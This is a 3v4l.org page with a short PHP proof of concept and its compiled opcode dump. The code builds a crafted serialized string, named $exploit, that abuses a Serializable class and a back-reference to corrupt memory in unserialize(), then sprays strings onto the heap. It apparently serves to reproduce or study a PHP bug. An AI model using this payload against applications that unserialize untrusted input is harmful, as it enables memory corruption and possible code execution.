3v4l.org

run code in 300+ PHP versions simultaneously
<?php

class obj implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

$inner = 'a:2:{i:0;i:1;i:1;i:2';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}';

$data = unserialize($exploit);

for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}

var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
Branch analysis from position: 14
filename:       /in/gDfuY
function name:  (null)
number of ops:  24
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data, !3 = $i, !4 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   DECLARE_CLASS                                            'obj'
   13     1        ASSIGN                                                   !0, 'a%3A2%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2'
   14     2        STRLEN                                           ~6      !0
          3        CONCAT                                           ~7      'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~6
          4        CONCAT                                           ~8      ~7, '%3A%7B'
          5        CONCAT                                           ~9      ~8, !0
          6        CONCAT                                           ~10     ~9, '%7Di%3A1%3BR%3A5%3B%7D'
          7        ASSIGN                                                   !1, ~10
   16     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAR                                                 !1
         10        DO_ICALL                                         $12     
         11        ASSIGN                                                   !2, $12
   18    12        ASSIGN                                                   !3, 0
         13      > JMP                                                      ->18
   19    14    >   CONCAT                                           ~16     'hi', !3
         15        ASSIGN_DIM                                               !4, !3
         16        OP_DATA                                                  ~16
   18    17        PRE_INC                                                  !3
         18    >   IS_SMALLER                                               !3, 5
         19      > JMPNZ                                                    ~18, ->14
   22    20    >   INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !2
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/gDfuY
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    7     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/gDfuY
function name:  unserialize
number of ops:  7
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   RECV                                             !0      
    9     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   10     6      > RETURN                                                   null

End of function unserialize

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0

